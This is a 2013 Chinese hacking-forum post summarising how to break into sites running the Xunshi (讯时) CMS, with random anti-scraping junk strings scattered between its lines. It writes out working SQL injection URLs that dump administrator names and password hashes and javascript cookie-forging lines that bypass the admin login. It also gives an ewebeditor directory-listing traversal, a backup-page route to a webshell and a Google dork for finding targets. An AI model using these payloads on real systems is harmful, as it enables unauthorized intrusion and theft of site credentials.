找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2527|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
! b! Q1 R$ Z/ T! j5 ~. A9 T0 z$ m1 V
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
# Z) U8 I$ r9 K# V% E  K0 M! P2 C
. c" ]5 P" X/ i; s3 t% |# ^, V. Q以下本文总结来自黑防去年第9期杂志上的内容...
# M+ w6 Q: [, Y, y- G% T) P3 K  X$ c5 i6 A4 N
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
' j& B- A6 `) }) O' v) L8 E8 X% f- k; j! `! [' k: n
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
9 g: i; L5 a% E. o, H. }
" y( H6 X: Q/ ?' s记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况" i. e& h5 N+ [0 Q
这里一个注入
% t/ ?5 L' B3 l) F7 }+ j# y5 @3 E6 G4 b0 z5 K
效果如图:
" }; e7 V* @* }6 w4 Q! G& M. o4 d& N# |. H

. B9 k% I% f0 V$ h) Q7 _3 N
+ O; |; ~& p1 }! h9 a+ j1 X0 E% H这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
- {! A0 R- ^2 J: Q7 h
& Z  K. D0 V# N; p1 h% H6 b  \) @密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
+ R$ j. f; d" Q2 U  x& m: o& \3 B# P$ }* |3 l$ d
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
  p  R) q# E- @2 [6 ~' Z; b7 [9 q0 m  H4 W0 i8 z, f( _) h
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:+ {: x: G7 k) P6 x, u
* d5 d# u8 y( ~, C& |
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞; S  I% s- J5 b- s3 v5 X& ]

2 g/ u+ T9 |. v! L它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以9 T* N% I' n0 L2 H/ `% J+ P
3 y1 r7 [4 g) a2 X+ p
访问这页面来列目录..步骤如下:
. E- p+ D0 D1 h6 j1 t/ n; r$ w5 X
javascript:alert(document.cookie="admindj=1") 0 \8 m* y: h, @" ^! i2 k3 o

. ?; w3 }$ p: _) ~# `6 ghttp://www.political-security.co ... asp?id=46&dir=../..4 n' L7 A5 q% n8 E" e' M
4 L/ @2 E% t5 t
效果如图:1 x+ p# A6 B, g. x: R, ^# E9 G
9 X/ q' x  ]1 g2 x! a) M, c
9 k; q$ q+ [5 Z5 Q! ?- E( r' f, \
' s5 {& H( D$ l$ D, F& j6 G$ T
这样全站目录都能瞧了..找到后台目录..进去..
/ g8 T' `$ H! y  e/ m9 C# K6 b. o0 Q' [" t1 z# }1 s
那么进了后台怎么拿shell??上传--备份就ok了..1 G0 B5 W# j/ Y( Q% m, f  @3 W9 X

# y! {  x3 {  A4 f那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
& O6 b; u5 u* Q* G
) B) Y0 V5 U% z这个我也碰到过一次..你都可以通过列目录来实现..
1 B+ m; `& Y7 {7 m. n# M! |1 I1 L) S
javascript:alert(document.cookie="admindj=1")
7 G( f4 X$ Y; I
8 W% g$ `9 }9 C0 a: i8 b& Shttp://www.political-security.co ... p?action=BackupData
" V! H- k, @, h/ k
. e2 c; V  ?' B( F+ z6 i备份ok..
5 k" ~% w' j+ |0 t
% W0 U" M) n9 P: x那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
0 K! ]" W2 }$ G  d4 J* h) U: V5 h! t! c! c4 E; |% i$ P
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下5 p# |5 k4 D3 W2 Z

# l+ J$ T% _* |+ W! X0 X# D然后访问此页面进行注入..步骤如下:
, ~* w9 n( Y2 x; Z3 @" G% I  c# R4 V- ~  G) F' C
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")/ Q% G  W# m. z& X8 B1 {
: l# c) l2 i4 N4 J
然后请求admin/admin_chk.asp页面
0 J4 j! w: P7 g6 r5 x/ [6 I
3 B" ^  w* L0 ]/ G3 N7 H输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
2 t. c9 X: e: Y4 W2 t' I6 b$ y8 b
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
, q" N+ L& L# I; {
; p; X% \, @8 `/ [3 g效果如图所示:  [/ T" G0 w- u4 T

! E5 j- a" F, t" m
- g3 d" ?% R5 q2 d. i# Q) `8 Y! Q& o0 \& i) `7 W2 D( E2 F* _
讯时漏洞2# ~$ X5 x; L6 I+ x
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)& X  B$ a8 Z% t5 b1 e! L6 a

$ g2 `) \. l. N1 u1、/admin/admin_news_pl_view.asp?id=1, w9 Z% X. O* ?  e
//id任意 填入以下语句% s$ [( n% i2 q+ r

( X4 ^9 _1 c+ `' [, j0 I2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
. a$ n' X/ t7 k
3 O; E* p9 x8 r2 I% k. @$ K+ A' Y! `9 x8 H  p
. S) q- [9 r" O  U
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='5 }% R' y- \9 N. X7 K0 S7 i- R. D0 z
0 g  V' ?+ D* L2 L4 o/ o
+ T6 ?, c. y4 J- C9 V

0 V" a0 O+ {0 D6 O9 E爆出管理员帐号和密码了2 A$ |1 P2 k% x% `, f9 Q! C

* J* D; z( m3 z3 }* h
: e9 w' Q. ^7 @" V' @1 C* Z* G3 H- ], a
4、cookies进后台! R5 ^; a5 U4 ^8 b7 W4 a
, ^+ L1 \( o# H
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));  u" B2 ?+ d- `2 p' m5 Y
( C- B3 ~7 e- k2 }' F# c; k8 B# i
% D* U* C- k0 I/ G: C, K

2 z+ O  J% w1 U4 O2 O7 f) F0 [5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!& q' y% d$ E0 z6 B- W- n

  _2 y) m) }8 P$ I9 w" Q6 m* n" s+ _3 \5 U, l2 D
( C- }# b9 J! I
6、后台有上传和备份取SHELL不难。
% j' u: A( ^$ }% p: t . `  [$ A" b1 M( \
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../.., g! n& `  B4 g, T# |. F; q1 w
7 _& b0 A, ?0 O! N7 i1 y
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!& b- d5 c* E4 H$ g5 z, `

+ Z, l" e4 ?7 i' a! \' v% W
* v: Y- ]- F% g; m2 g. Y. s8 {, v4 m$ N. l1 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表